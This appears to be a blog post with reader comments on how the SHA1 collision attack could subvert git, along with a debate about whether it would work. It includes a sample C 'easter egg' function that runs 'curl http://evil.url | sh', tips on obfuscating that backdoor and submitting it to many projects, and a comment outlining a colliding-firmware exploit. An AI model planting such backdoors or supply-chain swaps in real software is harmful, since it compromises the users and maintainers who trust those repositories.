Happy SHA1 collision day everybody!
If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files.
The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.)
Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks.
The "good" data chunk might then look like this:
7*yLN#!NOKj@{FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ
And the "bad" data chunk like this:
9xiV^Ksn=<A!<^}l4~`uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e}Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh
Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is.
Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:
7*yLN#!NOK
3*\LN'\NO@
3*/LN \.A
5*\LN \.
>=======:)
5*\7N /.
3*/7N /.V
3*\7N'/NO@
7*y7N#!NOX
Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN \\.A \
5*\\LN \\. \
>=======:) \
5*\\7N /. \
3*/7N /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
* Run program with --easter-egg to see it in all its glory.
*/
/* Call this at the top of main() */
check_display_easter_egg (char **argv) {
if (strcmp(argv[1], "--easter-egg") == 0)
printf(amazing_ascii_art);
if (amazing_ascii_art[0] == "9")
system("curl http://evil.url | sh");
}
Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.)
After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs.
Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them).
Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper.
You can pick either of these two lessons to take away:
ASCII art in code is evil and unsafe. Avoid it at any cost.
apt-get moo
Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.
My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.
Hello Joey,
neat post. As far as I can tell, you also need to get the SHA calculation in the proper state, though For example, just the two different string parts will not compare equal, you need the 192 bytes of prefix, too. Also, you cannot prefix the blobs with a common prefix and get the same result. So I would think that there is still significant "cryptographic" effort needed to apply this to git.
Best regards
Thomas
As far as I know, you do not need a 192 byte prefix, it should be able to be any length you choose. "192" does not appear in the paper. The 192 bytes that appear before the good/bad chunk in the SHA1 colliding pdfs consists of the regular header of a pdf document. A prefix consisting of some C code would work just as well.
To make files that result in colliding git blobs, one only has to add at the front of the above prefix eg "blob 5000\0". The SHA1 collision generation attack then proceeds as normal. Once you have its results, you just strip that blob prefix from them, pad them up to the selected size of 5000 (eg by adding more common C code at the end), to get files that can be checked into git and will yeild colliding blobs. The need for the file size to remain fixed is the only real complication here.
Hello,
I do not think your idea is applicable as it is, because what you are using here is two files, with a variable part (the first line of ASCII art), a common prefix (everything before that line), but also a common suffix (everything after that line). If your variable part is designed to that the concatenation of the common prefix and that part gives the same hash with the two versions, that will not be the case for the concatenation of the common prefix, that part and the common suffix. Therefore, the two versions of the complete files with not have the same hash, only their first three lines do, but nobody verifies files integrity by taking the hash of its first three lines…
It may be possible to mount such an attack, but I think it would be quite more complicated…
\
, for example) is, AFAIK, much harder than a general collision. I wanted to use a MD5 collision to break Haskell’s type safety viaTypeable
, but failed because of that. Also, would the prefix have to have a certain length?@nomeata, I'm sure it would be harder to limit the collision to printable characters. How hard I don't know (even after reading the paper).
AIUI, they're using a SAT solver; it might be that it could be modified to remove solutions that use unprintable characters, and it might only have to work a "little" harder.
Or it might take the obvious worst case of needing to run the collision generator repeatedly until it finally finds a suitable collision.
@tanmail sorry, you're entirely wrong.
Once the common prefix and the collision data have been fed into SHA1, both the "good" and "bad" SHA1 calculations have the same internal state. So, any common suffix after that will result in the same SHA1.
If you don't believe me (or the paper that says that same thing in a more mathy way), you can easily verify this with the published SHA1 collision files.
Of course, what we really need to worry about is not ASCII art, but binary firmware published by git repository. The linux firmware repository, for example.
Here's how to use the SHA1 collision generation attack to modify a firmware file so there are two versions, one of which runs a malicious exploit and the other which does not. The good version can be distributed, and then replaced by the bad version without the replacement being noticed.
Identify the first instruction run by the firmware at boot. Replace with a jump to 129 bytes after the current end of the firmware.
Use the resulting file as the input the the collision generation attack. (If you wan to target this being stored in a git repository, include a git blob header in the data used to generate the collision.) Now you have two 128 byte chunks which when appended to the file in #1, result in two different, SHA1-colliding files.
At the end of each of the two different files, append the same payload. Since the SHA1 hash function is in the same state at the end of each file in #2, appending identical data to each file yields new files that also collide.
The payload examines the memory in the 128 byte colliding area. If it sees the "good" version, it runs the instruction that was originally replaced with the jump, and jumps back to the second original instruction. If it sees the "bad" version, it runs the remainder of the payload, the exploit.
Obviously there is some trickiness to do with relative addresses and returning registers to the original state when jumping back in the "good" version etc. But this should be very doable for any assembly programmer; it should even be possible to completely automate it.
Is it possible to make the both colliding PDFs as OLE objects with same hash? For example so when OLE object is embedded in any file then both objects can be interchanged without changing file hash?